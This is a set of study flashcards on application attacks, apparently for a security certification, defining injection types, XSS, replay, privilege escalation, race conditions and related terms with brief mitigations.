1.3 - Application Attacks

Question 1

Define privilege escalation attack.

Answer 1

A cyberattack to gain illicit access of elevated rights, permissions, entitlements, or privileges beyond what is assigned for an identity, account, user, or machine.

Question 2

Define horizontal privilege escalation.

Answer 2

When someone obtains the permissions that someone else in the same group has.

Question 3

List a few ways that you can mitigate privilege escalation.

Answer 3

1) Patch quickly
2) Updated anti-virus/anti-malware software
3) Data execution prevention
- Only data in executable areas can run
4) Address space layout randomization
- Prevent a buffer overrun at a known memory
address

Question 4

What is Cross-site Scripting(XSS)?

Answer 4

A type of attack that injects some kind of malicious script that is executed in the web browser.

Question 5

Name three types of Cross-Site Scripting (XSS).

Answer 5

1) Reflected XSS
2) Stored XSS
3) DOM-based XSS

Question 6

What is a Reflected XSS attack?

Answer 6

When a malicious script is reflected off a web application to the victim’s browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. Comes from the current HTTP request.

Question 7

What is a DOM-based XSS attack?

Answer 7

When the attack payload is executed as a result of modifying the DOM “environment “ in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. Exists in the client-side code rather than server-side code.

Question 8

What is a Stored XSS attack?

Answer 8

When an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. This is only possible if your application is designed to store user input (a message board or social media website).

Question 9

List a few ways to protect against XSS.

Answer 9

1) Be careful when clicking untrusted links
2) Consider disabling JavaScript
3) Keep your browser and applications updated
4) Validate input
- Don’t allow users to add their own scripts to an
input field

Question 10

Define a code injection attack.

Answer 10

When someone puts their own code inside of an application. This is possible due to bad programming.

Question 11

Define a SQL injection.

Answer 11

An attack that injects malicious SQL code into an application, allowing the attacker to view or modify a database.

Question 12

What is an LDAP Injection?

Answer 12

An attack in which queries are constructed from untrusted input without prior validation or sanitization. Arbitrary commands can be used to grant permission to unauthorized queries and modify content within the LDAP tree. Similar to a SQL injection.

Question 13

What is an XML Injection?

Answer 13

An attack technique used to manipulate or compromise the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter the intended logic of the application to perform unauthorized actions or access sensitive data.

Question 14

What is a DLL Injection?

Answer 14

An attack technique that allows users to run any code in the memory of another process, by forcing the process to load a foreign DLL file. This can allow for unauthorized actions.

Question 15

Define a buffer overflow.

Answer 15

Occurs when the amount of data in the buffer exceeds its storage capacity. That extra data overflows into adjacent memory locations and corrupts or overwrites the data in those locations.

Question 16

Define replay attack.

Answer 16

A type of network attack in which an attacker captures a valid network transmission and then transmits it later. The main objective is to trick the system into accepting the retransmission of the data as a legitimate one.

Question 17

Define a pass the hash attack.

Answer 17

A type of replay attack in which an attacker captures a password hash (as opposed to the password characters) and then passes it through for authentication and lateral access to other networked systems.

Question 18

Identify some ways that you can prevent a pass the hash attack.

Answer 18

1) Salting the hash
2) Encryption
3) Use a session ID with the password hash to create
a unique authentication hash each time

Question 19

Define session hijacking.

Answer 19

A method of taking over a web user session by surreptitiously obtaining the session ID and masquerading as the authorized user.

Question 20

Identify a few ways to prevent replay attacks.

Answer 20

1) Encrypt end-to-end
- HTTPS
2) Encrypt end-to-somewhere
- VPN

Question 21

What is Cross-site Request Forgery?

Answer 21

An attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering, an attacker may trick the users of a web application into executing actions of the attacker’s choosing.

Question 22

What is Server-side Request Forgery?

Answer 22

An attacker abuses server functionality to access or modify resources. The server is tricked into making HTTP requests to internal resources or other servers on behalf of the attacker.

Question 23

What is a Driver Manipulation attack?

Answer 23

A sophisticated attack in which a program attempts to modify a driver’s functionality. The program exploits the legitimate purpose of the driver.

Question 24

What is Shimming?

Answer 24

An application attempts to call an older driver, and the OS intercepts the call and redirects it to run the shim code instead. A driver shim is additional code that can be run instead of the original driver. Shimming provides the solution that makes it appear that the older drivers are compatible.

Question 25

What is Refactoring?

Answer 25

The process of rewriting the internal processing of the code, without changing its external behavior. It is usually done to correct problems related to software design.

Question 26

Define metamorphic malware.

Answer 26

Malware that is different each time it is downloaded in order to stay outside of anti-malware definitions. Can intelligently redesign itself. Uses refactoring.

Question 27

Define an SSL stripping/ HTTP downgrade attack.

Answer 27

A combination of an on-path (mitm) attack with a downgrade attack. Modifies data between the victim and the web server to downgrade it to something with weak or no encryption.

The website visitor will send an HTTP request, and when the website sends back a request for them to use HTTPS, the attacker will intercept it and set up an HTTPS session with the website. They will decrypt for the visitor and receive any data in the middle.

Question 28

What are Race Conditions?

Answer 28

An undesirable situation that occurs when a device or system attempts to performs two or more operations at the same time, but because of the nature of the device or system, the operations must be done in the proper sequence to be done correctly.

Question 29

What is Time-of-Check to Time-of-Use (TOCTOU)?

Answer 29

A file-based race condition that occurs when a resource is checked for a particular value, such as whether a file exists or not, and that value then changes before the resource is used, invalidating the results of the check.

Can be when multiple people access a resource at the same time and one of them makes changes.

Question 30

What is a memory leak?

Answer 30

A type of resource leak that occurs when a computer program incorrectly manages memory allocations in a way that memory which is no longer needed is not released.

Question 31

Define NULL Pointer dereference.

Answer 31

A programming technique that references a portion of the memory. Application crashes and debug information is displayed when that reference points to nothing. This can cause a DoS.

Question 32

What is an Integer Overflow?

Answer 32

When you attempt to store inside an integer variable a value that is larger than the maximum value the variable can hold.

Question 33

Define a directory traversal/ path traversal attack.

Answer 33

An attack that takes advantage of a web server software vulnerability that allows the attacker to browse past the web server root, outside of the website’s file directory.

Question 34

What are some examples of improper error handling?

Answer 34

1) Too much detail
2) Network information
3) Memory dump
4) Stack traces
5) Database dump

Question 35

How should input be handled in an application?

Answer 35

All input should be considered malicious.

Question 36

What are some examples of consequences of improper input handling?

Answer 36

SQL injections, buffer overflows, DoS

Question 37

Define a resource exhaustion attack.

Answer 37

A specialized DoS attack that uses up a computer or server’s resources.

Ex. ZIP bomb: a 42 kilobyte .zip compressed file uncompresses to 4.5 petabytes

Question 38

Define a DHCP starvation.

Answer 38

Attacker floods a network with IP address requests to exhaust the list of DHCP addresses.